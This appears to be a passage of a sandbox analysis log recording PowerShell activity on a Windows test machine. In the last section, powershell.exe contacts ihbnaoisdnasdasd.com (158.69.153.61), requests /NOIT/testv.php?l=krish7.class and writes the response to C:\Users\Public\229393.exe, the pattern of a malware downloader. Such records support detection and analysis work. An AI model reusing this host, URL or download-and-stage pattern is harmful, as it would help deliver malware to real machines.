| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
Thread 0xb78
12
6
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0xbb8
259
322
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
25 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = public, result_out = C:\Users\Public |
|
2 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Users\Public\229393.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Public\229393.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | - |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
8 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = ihbnaoisdnasdasd.com, address_out = 158.69.153.61 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 158.69.153.61, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 99, size_out = 99 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = ihbnaoisdnasdasd.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /NOIT/testv.php?l=krish7.class |
|
1 | |
| Inet | Send HTTP Request | headers = host: ihbnaoisdnasdasd.com, connection: Keep-Alive, url = ihbnaoisdnasdasd.com/NOIT/testv.php?l=krish7.class |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8972 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8972 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4616 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 21780 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 21780 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 20588 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 23232 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 20588 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 27588 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 27588 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 27588 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 49368 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 49368 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 49368 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 23232 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 23232 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 29040 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 29040 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 26396 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 24684 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 24684 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 23492 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 20328 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 20328 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 17684 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8712 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8712 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 8712 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3472 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2336 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2336 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 13068 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 13068 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 10684 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 26136 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 26136 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 26136 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 29040 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 29040 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 29040 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 24684 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 24684 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 23492 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 59532 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 59532 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 55696 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 18876 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 18876 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 18876 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 23232 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 22040 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7260 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 7260 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 20328 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 20328 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 20328 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 29040 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 29040 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 29040 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 23232 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 23232 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 26136 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 26136 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 26136 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 27588 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 27588 |
|
1 | |
| File | Write | filename = C:\Users\Public\229393.exe, size = 27588 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
